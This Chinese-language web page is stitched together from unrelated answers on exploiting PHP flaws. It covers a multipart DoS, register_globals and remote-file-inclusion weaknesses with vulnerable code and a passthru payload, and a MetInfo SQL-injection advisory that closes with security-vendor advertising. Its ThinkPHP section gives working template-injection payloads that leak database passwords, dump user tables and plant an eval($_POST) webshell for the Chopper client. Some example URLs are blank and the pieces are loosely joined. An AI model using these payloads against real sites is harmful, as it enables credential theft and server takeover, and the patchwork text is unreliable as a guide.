如何利用php的漏洞（如何利用php的漏洞處理）

本文目錄一覽：

• 1、如何利用php multipart/form-data 遠程dos漏洞
• 2、如何對php中常見漏洞進行攻擊與防護翻譯
• 3、thinkphp 怎麼利用漏洞
• 4、php漏洞怎麼修復

如何利用php multipart/form-data 遠程dos漏洞

PHP解析multipart/form-datahttp請求的body part請求頭時，

重複拷貝字符串導致DOS。遠程攻擊者通過發送惡意構造的multipart/form-data請求，導致服務器CPU資源被耗盡，從而遠程DOS服務器。

如何對php中常見漏洞進行攻擊與防護翻譯

[全局變量]

PHP中的變量不需要事先聲明，它們會在第一次使用時自動創建，它們的類型也不需要指定，它們會根據上下文環境自動確定。從程序員的角度來看，這無疑是一種極其方便的處理方法。很顯然，這也是快速開發語言的一個很有用的特點。一旦一個變量被創建了，就可以在程序中的任何地方使用。這個特點導致的結果就是程序員很少初始化變量，畢竟，當它們第一次創建時，他們是空的。

很顯然，基於PHP的應用程序的主函數一般都是接受用戶的輸入（主要是表單變量，上載文件和Cookie等），然後對輸入數據進行處理，然後把結果返回到客戶端瀏覽器。為了使PHP代碼訪問用戶的輸入儘可能容易，實際上PHP是把這些輸入數據看作全局變量來處理的。

例如：

FORM METHOD=”GET” ACTION=”test.php”

INPUT TYPE=”TEXT” NAME=”hello”

INPUT TYPE=”SUBMIT”

/FORM

很顯然，這會顯示一個文本框和提交按鈕。當用戶點擊提交按鈕時，“test.php”會處理用戶的輸入，當“test.php”運行時，“$hello”會包含用戶在文本框輸入的數據。從這裡我們應該看出，攻擊者可以按照自己的意願創建任意的全局變量。如果攻擊者不是通過表單輸入來調用“test.php”，而是直接在瀏覽器地址欄輸入;setup=no，那麼，不止是“$hello”被創建，“$setup”也被創建了。

譯者註：這兩種方法也就是我們通常說的“POST”和“GET”方法。

下面的用戶認證代碼暴露了PHP的全局變量所導致的安全問題：

?php

if ($pass == “hello”)

$auth = 1;

…

if ($auth == 1)

echo “some important information”;

?

上面的代碼首先檢查用戶的密碼是否為“hello”，如果匹配的話，設置“$auth”為“1”，即通過認證。之後如果“$suth”為“1”的話，就會顯示一些重要信息。

表面看起來是正確的，而且我們中有相當一部分人是這樣做的，但是這段代碼犯了想當然的錯誤，它假定“$auth”在沒有設置值的時候是空的，卻沒有想到攻擊者可以創建任何全局變量並賦值，通過類似“”的方法，我們完全可以欺騙這段代碼，使它相信我們是已經認證過的。

因此，為了提高PHP程序的安全性，我們不能相信任何沒有明確定義的變量。如果程序中的變量很多的話，這可是一項非常艱巨的任務。

一種常用的保護方式就是檢查數組HTTP_GET[]或POST_VARS[]中的變量，這依賴於我們的提交方式（GET或POST）。當PHP配置為打開“track_vars”選項的話（這是缺省值），用戶提交的變量就可以在全局變量和上面提到的數組中獲得。

但是值得說明的是，PHP有四個不同的數組變量用來處理用戶的輸入。HTTP_GET_VARS數組用來處理GET方式提交的變量，HTTP_POST_VARS數組用於處理POST方式提交的變量，HTTP_COOKIE_VARS數組用於處理作為cookie頭提交的變量，而對於HTTP_POST_FILES數組（比較新的PHP才提供），則完全是用戶用來提交變量的一種可選方式。用戶的一個請求可以很容易的把變量存在這四個數組中，因此一個安全的PHP程序應該檢查這四個數組。

[遠程文件]

PHP是一種具有豐富特性的語言，提供了大量的函數，使編程者實現某個功能很容易。但是從安全的角度來看，功能越多，要保證它的安全性就越難，遠程文件就是說明這個問題的一個很好的例子：

?php

if (!($fd = fopen(“$filename”, “r”))

echo(“Could not open file: $filenameBR\n”);

?

上面的腳本試圖打開文件“$filename”，如果失敗就顯示錯誤信息。很明顯，如果我們能夠指定“$filename”的話，就能利用這個腳本瀏覽系統中的任何文件。但是，這個腳本還存在一個不太明顯的特性，那就是它可以從任何其它WEB或FTP站點讀取文件。實際上，PHP的大多數文件處理函數對遠程文件的處理是透明的。

例如：

如果指定“$filename”為“”

則上面的代碼實際上是利用主機target上的unicode漏洞，執行了dir命令。

這使得支持遠程文件的include()，require()，include_once()和require_once()在上下文環境中變得更有趣。這些函數主要功能是包含指定文件的內容，並且把它們按照PHP代碼解釋，主要是用在庫文件上。

例如：

?php

include($libdir . “/languages.php”);

?

上例中“$libdir”一般是一個在執行代碼前已經設置好的路徑，如果攻擊者能夠使得“$libdir”沒有被設置的話，那麼他就可以改變這個路徑。但是攻擊者並不能做任何事情，因為他們只能在他們指定的路徑中訪問文件languages.php（perl中的“Poison null byte”攻擊對PHP沒有作用）。但是由於有了對遠程文件的支持，攻擊者就可以做任何事情。例如，攻擊者可以在某台服務器上放一個文件languages.php，包含如下內容：

?php

passthru(“/bin/ls /etc”);

?

thinkphp 怎麼利用漏洞

1. 使用URL可以查看用戶的數據庫帳號密碼DB_NAME,DB_PASS,DB_HOST

{@print(THINK_VERSION)}

{@print(C(‘’))}

{@print(C(‘DB_PASS’))}

2.使用模型D方法或者M方法，猜測後台帳號密碼，當然首先要先猜一下用戶的表名了

{@var_dump(D(user)-select())}

3.直接執行一句話代碼，然後用菜刀直接連接.

{${eval($_POST[s])}} 一句話密碼:s

php漏洞怎麼修復

近日，我們SINE安全對metinfo進行網站安全檢測發現，metinfo米拓建站系統存在高危的sql注入漏洞，攻擊者可以利用該漏洞對網站的代碼進行sql注入攻擊，偽造惡意的sql非法語句，對網站的數據庫，以及後端服務器進行攻擊，該metinfo漏洞影響版本較為廣泛，metinfo6.1.0版本，metinfo 6.1.3版本，metinfo 6.2.0都會受到該網站漏洞的攻擊。

metinfo建站系統使用的PHP語言開發，數據庫採用的是mysql架構開發的，在整體的網站使用過程中，簡單易操作，可視化的對網站外觀進行設計，第三方API接口豐富，模板文件較多，深受企業網站的青睞，建站成本較低可以一鍵搭建網站，目前國內使用metinfo建站的網站數量較多，該metinfo漏洞會使大部分的網站受到攻擊影響，嚴重的網站首頁被篡改，跳轉到其他網站，以及網站被劫持跳轉到惡意網站上，包括網站被掛馬，快照被劫持等情況都會發生。

關於該metinfo漏洞的分析，我們來看下漏洞產生的原因：

該漏洞產生在member會員文件夾下的basic.php代碼文件：

metinfo獨有的設計風格，使用了MVC框架進行設計，該漏洞的主要點在於使用了auth類的調用方式，在解碼加密過程的算法中出現了問題，我們再來看下代碼：

通常加密，以及解密的算法是不可以可逆的，但是metinfo寫的代碼可以進行偽造函數值進行逆算，我們看這個構造的惡意函數，這裡的key值是從前端met_webkeys值里進行獲取，將獲取到的webkeys值進行寫入，並賦值到配置文件里，config目錄下的config_safe.php代碼里。我們通過查看這個代碼，發現寫入的值沒有辦法進行PHP腳本的執行，本來以為可是偽造key值進行寫入木馬，發現行不通，但是在這個偽造key值的過程可以進行sql注入攻擊，採用是延時注入方式進行

關於metinfo漏洞的修復建議，以及安全方案

目前metinfo最新版本發布是2019年3月28日，6.2.0版本，官方並沒有針對此sql注入漏洞進行修復，建議網站的運營者對網站的後台地址進行更改，管理員的賬號密碼進行更改，更改為數字+字符+大小寫的12位以上的組合方式，對網站的配置文件目錄進行安全限制，去掉PHP腳本執行權限，如果自己對代碼不是太熟悉，建議找專業的網站安全公司來處理修復漏洞，國內SINE安全，以及綠盟，啟明星辰，都是比較不錯的網站漏洞修復公司。